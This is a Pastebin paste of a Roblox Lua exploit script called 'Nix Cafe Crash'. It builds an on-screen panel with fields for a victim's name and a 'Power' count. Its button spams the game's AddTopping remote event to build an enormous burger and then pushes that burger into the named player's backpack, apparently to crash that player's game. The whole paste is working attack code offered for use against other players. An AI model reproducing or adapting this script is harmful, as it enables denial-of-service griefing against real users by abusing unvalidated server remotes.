Advertisement
leelandshoe

Untitled

Aug 31st, 2018
265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.74 KB | None | 0 0
  1.  
  2. -- Instances:
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local Frame = Instance.new("Frame")
  5. local TextLabel = Instance.new("TextLabel")
  6. local TextButton = Instance.new("TextButton")
  7. local TextBox = Instance.new("TextBox")
  8. local TextBox_2 = Instance.new("TextBox")
  9. local TextLabel_2 = Instance.new("TextLabel")
  10. --Properties:
  11. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  12.  
  13. Frame.Parent = ScreenGui
  14. Frame.Active = true
  15. Frame.BackgroundColor3 = Color3.new(0.666667, 0.333333, 1)
  16. Frame.BackgroundTransparency = 0.20000000298023
  17. Frame.Draggable = true
  18. Frame.Position = UDim2.new(0.39612186, 0, 0.335766435, 0)
  19. Frame.Size = UDim2.new(0, 206, 0, 152)
  20.  
  21. TextLabel.Parent = Frame
  22. TextLabel.BackgroundColor3 = Color3.new(0, 0, 0)
  23. TextLabel.Size = UDim2.new(0, 206, 0, 24)
  24. TextLabel.Font = Enum.Font.SourceSansBold
  25. TextLabel.Text = "Nix Cafe Crash"
  26. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  27. TextLabel.TextSize = 14
  28.  
  29. TextButton.Parent = Frame
  30. TextButton.BackgroundColor3 = Color3.new(0, 0, 0)
  31. TextButton.Position = UDim2.new(0.145631075, 0, 0.276315778, 0)
  32. TextButton.Size = UDim2.new(0, 146, 0, 39)
  33. TextButton.Font = Enum.Font.SourceSans
  34. TextButton.Text = "Crash"
  35. TextButton.TextColor3 = Color3.new(1, 1, 1)
  36. TextButton.TextSize = 14
  37. TextButton.MouseButton1Down:connect(function()
  38.  
  39. Victim = TextBox_2.Text
  40.  
  41. Power = TextBox.Text
  42.  
  43. local SpamBurgerCount = Power
  44.  
  45. game.ReplicatedStorage.AddTopping:FireServer(nil,game.ReplicatedStorage.BurgerIngredients.BottomBun)
  46. local Burger = game.Players.LocalPlayer.Character:WaitForChild("BottomBun")
  47.  
  48. for i = 1,SpamBurgerCount do
  49. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Cheese)
  50. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Ketchup)
  51. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Meat)
  52. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Mustard)
  53. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Onion)
  54. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Pickles)
  55. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Lettuce)
  56. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Tomatoes)
  57. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Mushrooms)
  58. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.Bacon)
  59. end
  60. game.ReplicatedStorage.AddTopping:FireServer(Burger,game.ReplicatedStorage.BurgerIngredients.TopBun)
  61. wait()
  62. Burger.Parent = game.Players[Victim].Backpack
  63. end)
  64.  
  65. TextBox.Parent = Frame
  66. TextBox.BackgroundColor3 = Color3.new(0, 0, 0)
  67. TextBox.Position = UDim2.new(0.597087383, 0, 0.638157845, 0)
  68. TextBox.Size = UDim2.new(0, 53, 0, 30)
  69. TextBox.Font = Enum.Font.SourceSans
  70. TextBox.Text = "Power"
  71. TextBox.TextColor3 = Color3.new(1, 1, 1)
  72. TextBox.TextSize = 14
  73.  
  74. TextBox_2.Parent = Frame
  75. TextBox_2.BackgroundColor3 = Color3.new(0, 0, 0)
  76. TextBox_2.Position = UDim2.new(0.145631075, 0, 0.638157845, 0)
  77. TextBox_2.Size = UDim2.new(0, 53, 0, 30)
  78. TextBox_2.Font = Enum.Font.SourceSans
  79. TextBox_2.Text = "Name"
  80. TextBox_2.TextColor3 = Color3.new(1, 1, 1)
  81. TextBox_2.TextSize = 14
  82.  
  83. TextLabel_2.Parent = Frame
  84. TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
  85. TextLabel_2.BackgroundTransparency = 1
  86. TextLabel_2.Position = UDim2.new(0, 0, 0.914473712, 0)
  87. TextLabel_2.Size = UDim2.new(0, 206, 0, 13)
  88. TextLabel_2.Font = Enum.Font.SourceSans
  89. TextLabel_2.Text = "by leelandshoe"
  90. TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
  91. TextLabel_2.TextSize = 14
  92. -- Scripts:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement